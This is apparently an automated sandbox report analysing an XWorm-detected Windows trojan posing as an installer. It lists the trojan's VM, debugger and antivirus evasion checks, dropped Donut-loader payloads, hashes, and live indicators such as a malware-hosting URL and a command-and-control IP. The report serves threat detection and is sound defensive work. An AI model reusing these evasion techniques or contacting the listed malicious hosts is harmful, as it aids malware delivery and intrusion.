Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\31-o_Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\31-o_Installer.exe	Memory allocated: 2F30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Memory allocated: 3130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Memory allocated: 5130000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe

Window / User API: threadDelayed 9787

Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe TID: 4392	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe TID: 5336	Thread sleep count: 9787 > 30	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe TID: 5336	Thread sleep count: 64 > 30	Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: 31-o_Installer.exe, 00000000.00000002.4545682030.00000000006B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 31-o_Installer.exe, 00000000.00000002.4545682030.00000000006B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW'
Source: 31-o_Installer.exe, 00000000.00000002.4545682030.0000000000665000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW fk%SystemRoot%\system32\mswsock.dll'

Source: C:\Users\user\Desktop\31-o_Installer.exe

API call chain: ExitProcess graph end node

graph_0-25976

Source: C:\Users\user\Desktop\31-o_Installer.exe

Code function: 0_2_002665D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_002665D1

Source: C:\Users\user\Desktop\31-o_Installer.exe

0_2_002740E4

Source: C:\Users\user\Desktop\31-o_Installer.exe

Code function: 0_2_02E71628 mov eax, dword ptr fs:[00000030h]

0_2_02E71628

Source: C:\Users\user\Desktop\31-o_Installer.exe

Code function: 0_2_00277CB1 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

0_2_00277CB1

Source: C:\Users\user\Desktop\31-o_Installer.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_002665D1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_002665D1
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0026C78D SetUnhandledExceptionFilter,	0_2_0026C78D
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: 0_2_0026A792 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0026A792

Source: C:\Users\user\Desktop\31-o_Installer.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe

Code function: 0_2_00261671 cpuid

0_2_00261671

Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_0026E04E
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: GetLocaleInfoA,	0_2_00274859
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	0_2_0026F895
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0026F955
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	0_2_0026F9BC
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	0_2_0026F9F8
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	0_2_0026DC2B
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_0026ECAA
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	0_2_002744BA
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0026F4CD
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_00274594
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	0_2_0026F5C2
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	0_2_0026F669
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	0_2_0026F6C4
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_2_0026EF98
Source: C:\Users\user\Desktop\31-o_Installer.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_2_00265FC5

Source: C:\Users\user\Desktop\31-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\31-o_Installer.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\31-o_Installer.exe

Code function: 0_2_002641BA GetSystemTimeAsFileTime,__aulldiv,

0_2_002641BA

Source: C:\Users\user\Desktop\31-o_Installer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 31-o_Installer.exe, 00000000.00000002.4545682030.000000000063E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\31-o_Installer.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.31-o_Installer.exe.5320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31-o_Installer.exe PID: 6672, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.31-o_Installer.exe.5320000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.31-o_Installer.exe.5320000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4548525663.0000000005320000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 31-o_Installer.exe PID: 6672, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	34 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
31-o_Installer.exe	26%	ReversingLabs	Win32.Trojan.Doina
31-o_Installer.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
156.238.235.31	0%	Avira URL Cloud	safe
http://guanlix.cn:881/31.ccp	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
guanlix.cn	91.208.240.157	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
156.238.235.31	true	Avira URL Cloud: safe	unknown
http://guanlix.cn:881/31.ccp	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	31-o_Installer.exe, 00000000.00000002.4547420805.0000000003131000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
156.238.235.31	unknown	Seychelles		394281	XHOSTSERVERUS	true
91.208.240.157	guanlix.cn	unknown		139659	LUCID-AS-APLUCIDACLOUDLIMITEDHK	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466307
Start date and time:	2024-07-02 19:20:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 48s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	31-o_Installer.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 26 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 31-o_Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
13:21:10	API Interceptor	8927934x Sleep call for process: 31-o_Installer.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
XHOSTSERVERUS	arm5-20240623-2204.elf	Get hash	malicious	Mirai	Browse	156.238.223.103
	H34bnq1S0l.elf	Get hash	malicious	Mirai	Browse	156.238.223.119
	armv6l.elf	Get hash	malicious	Mirai, Gafgyt	Browse	156.238.223.141
	hmips-20240612-1156.elf	Get hash	malicious	Mirai	Browse	156.254.22.229
	skt.m68k.elf	Get hash	malicious	Mirai	Browse	156.238.223.104
	4JsnDtTGF3.exe	Get hash	malicious	LimeRAT	Browse	156.238.224.215
	bPOGt24Mub.elf	Get hash	malicious	Mirai	Browse	156.231.2.118
	9XzxoGb2mX.elf	Get hash	malicious	Mirai	Browse	156.254.22.242
	2BVJRatDwx.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.254.22.237
	OuJmSE9GcF.elf	Get hash	malicious	Gafgyt, Mirai	Browse	156.254.22.204
LUCID-AS-APLUCIDACLOUDLIMITEDHK	https://telegram-wv.icu/	Get hash	malicious	Unknown	Browse	103.143.81.212
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	CXM5Rc4W2k.exe	Get hash	malicious	GhostRat	Browse	103.143.81.180
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159
	dllhostpgd.exe	Get hash	malicious	CobaltStrike	Browse	45.136.14.159
	qrUvlKkf7N.elf	Get hash	malicious	Mirai	Browse	45.144.137.162
	qwb3x7yFdW.elf	Get hash	malicious	Mirai	Browse	45.144.137.183
	sora.arm.elf	Get hash	malicious	Mirai	Browse	45.144.137.155

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\Public\Downloads\ind.cod

Download File

Process:	C:\Users\user\Desktop\31-o_Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.605549717634749
Encrypted:	false
SSDEEP:	1536:7rOXXfr0QSEEQrLQDcbAbmYcOM6eKXBwLsy1ETqfvu+P4Rtsj5o:WfwQPEQPJbAbmYrMRKXBwLs/
MD5:	0773F13D8E171C40379FE891118B7379
SHA1:	ABBE3F022B28A7BBBA7A9AECA45E183261D5D0E5
SHA-256:	115771EA79888FA4FFD6085DEC01446CC14753BA4A89F87248FDEA468B08708E
SHA-512:	8679F7FB8AF7560084E5F44A2839AF884912F0E5A9A6B3E5F79621194879EBAA9C252F270C1107F56276E9E0ACD5E0EBEF4B4A04B5293FC5A2C1240FD470CA05
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.cod, Author: unknown
Reputation:	low
Preview:	.........z.......l.....,../z.N...xC.!....x\.G6.K..8L.S.D.q.-.r.zd......6..".g..`.-S }...m..V.q.%."(.uA..\.;..... .z...-~8.1....Qn...ko'.v..T....G.n..c..HW.J..H?..tE.Y..\|...O.R...$8.C.V.9..q..DV.p.Y.[X.....B..u.z..)....~;.....D0..R.....@..Dt..(Q..2,.{G&......8LKy..hp...".Fn\..x.`..........b...6.=y.B..........................................................................................................................................................................................................................................................]..........t.<.b...........fc.Gl.K./..a.;..{....q....0..RC.K\.......8e.......1.[...&../$._.6.....Y9M.s.c5.5...G.{.#.'&.O...8e.@)m.e.......J.....a...3....k.....Q\KAx.Vp7S.T.$f.4....w.zde8.....[C....OI2+..3].M....O.E.u ...4....M.......Im_..'F..{:^..N*.A..gCG.-.;.f....R....o...,v:-.D..d.....ad.....e.N{5(4.[.TXE..-...E?.K.V......T..O.F.v.9.i&O .p...M.l..2l....Jdi5..^J.._Y....O...\A.C..SBX.S.n..J..i...+'..\|

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp

Download File

Process:	C:\Users\user\Desktop\31-o_Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.605549717634749
Encrypted:	false
SSDEEP:	1536:7rOXXfr0QSEEQrLQDcbAbmYcOM6eKXBwLsy1ETqfvu+P4Rtsj5o:WfwQPEQPJbAbmYrMRKXBwLs/
MD5:	0773F13D8E171C40379FE891118B7379
SHA1:	ABBE3F022B28A7BBBA7A9AECA45E183261D5D0E5
SHA-256:	115771EA79888FA4FFD6085DEC01446CC14753BA4A89F87248FDEA468B08708E
SHA-512:	8679F7FB8AF7560084E5F44A2839AF884912F0E5A9A6B3E5F79621194879EBAA9C252F270C1107F56276E9E0ACD5E0EBEF4B4A04B5293FC5A2C1240FD470CA05
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\31[1].ccp, Author: unknown
Reputation:	low
Preview:	.........z.......l.....,../z.N...xC.!....x\.G6.K..8L.S.D.q.-.r.zd......6..".g..`.-S }...m..V.q.%."(.uA..\.;..... .z...-~8.1....Qn...ko'.v..T....G.n..c..HW.J..H?..tE.Y..\|...O.R...$8.C.V.9..q..DV.p.Y.[X.....B..u.z..)....~;.....D0..R.....@..Dt..(Q..2,.{G&......8LKy..hp...".Fn\..x.`..........b...6.=y.B..........................................................................................................................................................................................................................................................]..........t.<.b...........fc.Gl.K./..a.;..{....q....0..RC.K\.......8e.......1.[...&../$._.6.....Y9M.s.c5.5...G.{.#.'&.O...8e.@)m.e.......J.....a...3....k.....Q\KAx.Vp7S.T.$f.4....w.zde8.....[C....OI2+..3].M....O.E.u ...4....M.......Im_..'F..{:^..N*.A..gCG.-.;.f....R....o...,v:-.D..d.....ad.....e.N{5(4.[.TXE..-...E?.K.V......T..O.F.v.9.i&O .p...M.l..2l....Jdi5..^J.._Y....O...\A.C..SBX.S.n..J..i...+'..\|

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.939901542426743
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	31-o_Installer.exe
File size:	249'344 bytes
MD5:	5913d1b0d2fa0204e9e063467d000c3a
SHA1:	50b4b4929edb21c17c49c40ac2a4050bd8f93768
SHA256:	3192aea6cf0c450948b2006ca0ef28dcaf06aa4c9730ef8dc8199975064cdf72
SHA512:	73a64c4bb61105b8363d6848c9132e2cf0a7ab131417b1190577c256a2d97277fbde0e2d2bb6990cb3e8dac786da7bb7928093cb2b465be9120495dbf0d4e2a8
SSDEEP:	3072:ouWmO3uTwghfpRBCa5XrD5sxTQ1mb7QNaV4ZQeAnuTCt2xbzmyoaq6rcYsc8kOee:ouW4TwSR57aTQkQN4njZ2x0p
TLSH:	39346B92F6C0C4B6D81711B5D83ADEB2126BBD798974010B36A5372F5EB72831937E0B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L......f.................v...T.....

File Icon


Icon Hash:	20246c0c56e20926

Static PE Info

General

Entrypoint:	0x405b41
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66820694 [Mon Jul 1 01:29:56 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b47c746b58dc722dcec07246158fda2

Entrypoint Preview

Instruction
call 00007F3B50DF3715h
jmp 00007F3B50DEC17Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007F3B50DEC304h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
jne 00007F3B50DEC2F9h
push eax
call 00007F3B50DEABDFh
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F3B50DEC355h
call 00007F3B50DEFF0Eh
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [004201F8h]
je 00007F3B50DEC304h
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F3B50DEC2F9h
call 00007F3B50DF40EFh
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [0041FEB8h]
je 00007F3B50DEC308h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F3B50DEC2FAh
call 00007F3B50DF394Eh
mov dword ptr [esi+04h], eax
